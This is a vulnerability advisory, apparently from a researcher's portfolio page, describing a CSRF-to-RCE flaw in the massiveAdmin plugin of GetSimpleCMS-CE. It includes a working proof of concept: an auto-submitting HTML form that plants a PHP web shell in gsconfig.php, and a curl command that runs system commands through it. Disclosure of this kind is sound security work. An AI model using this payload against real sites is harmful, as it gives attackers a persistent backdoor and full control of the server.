> ESC
↑↓ navigate select esc close
← Achievements

CVE-2026-28495: GetSimpleCMS-CE CSRF to Remote Code Execution

📅 2026-03-05 📂 Vulnerability Discovery 3 min read CVSS 9.7
CVECSRFRCEGetSimpleCMS-CEPHP
CVSS
9.7 CRITICAL
👥Estimated Impact: 100+ customers
TL;DR:
A CSRF vulnerability in the massiveAdmin plugin for GetSimpleCMS-CE allows an unauthenticated attacker to achieve RCE by overwriting gsconfig.php.

Summary

The massiveAdmin plugin (v6.0.3) bundled with GetSimpleCMS-CE v3.3.22 allows an authenticated administrator to overwrite the gsconfig.php configuration file with arbitrary PHP code via the gsconfig editor module. Due to a lack of CSRF protection, a remote unauthenticated attacker can exploit this via Cross-Site Request Forgery against a logged-in administrator, achieving Remote Code Execution (RCE) on the web server.

CVE ID: CVE-2026-28495
Advisory: GHSA-92wv-q2jp-qg88
Affected Versions: GetSimpleCMS-CE ≤ 3.3.22 (with massiveAdmin v6.0.3)

Vulnerability Details

The vulnerability exists in the gsConfigEdit() method of the massiveAdmin plugin class. The method writes raw POST data directly to the core configuration file.

Vulnerable Sink

In plugins/massiveAdmin/class/massiveAdmin.class.php, lines 696–698:

public function gsConfigEdit(){
    file_put_contents(GSROOTPATH . 'gsconfig.php', $_POST['content']);
}

The method writes the raw $_POST['content'] value directly to gsconfig.php with no input validation, no sanitization, and no CSRF token verification.

Trigger Point

In plugins/massiveAdmin/modules/gsconfig.php, lines 25 and 89–95:

<form action="#" method="Post">
    <textarea name="content" id="myTextarea" wrap='off'><?php echo file_get_contents(GSROOTPATH . 'gsconfig.php'); ?></textarea>
    ...
</form>

<?php
if (isset($_POST['editGSConfig'])) {
    global $MA;
    $MA->gsConfigEdit();
    ...
}

The form lacks any nonce or CSRF token. The POST handler triggers immediately when editGSConfig is present in the request.

Code Execution Path

The gsconfig.php file is a critical configuration file loaded on every single request to the application, making the injection persistent and highly impactful.

  • Frontend: index.php, line 23: require_once('gsconfig.php');
  • Backend: admin/inc/common.php, line 82: require_once(GSROOTPATH . 'gsconfig.php');

Proof of Concept

An attacker can host the following HTML page and lure an authenticated GetSimpleCMS-CE administrator to visit it. The script will automatically submit the form, injecting a web shell into the server configuration.

<html>
  <body>
    <h1>Loading...</h1>
    <form id="exploit" method="POST" action="https://TARGET/admin/load.php?id=massiveAdmin&massiveoption">
      <input type="hidden" name="content" value="<?php system($_GET['cmd']); ?>" />
      <input type="hidden" name="editGSConfig" value="1" />
    </form>
    <script>
      document.getElementById('exploit').submit();
    </script>
  </body>
</html>

Once the admin's browser submits the form:

  1. load.php passes the authentication check.
  2. The massiveAdmin plugin processes the POST request.
  3. gsConfigEdit() writes <?php system($_GET['cmd']); ?> to GSROOTPATH/gsconfig.php.

The attacker can then achieve RCE:

curl "https://TARGET/?cmd=id"
# Returns: uid=33(www-data) gid=33(www-data) ...

Impact

  • Remote Code Execution: Ability to execute arbitrary system commands with web server privileges.
  • Full Server Compromise: Access to read/write arbitrary files, pivot to internal networks, and exfiltrate data.
  • Persistent Backdoor: The injected code executes on every page load since gsconfig.php is required globally.
  • Zero Interaction Required: The payload auto-submits once the victim visits the malicious page.

References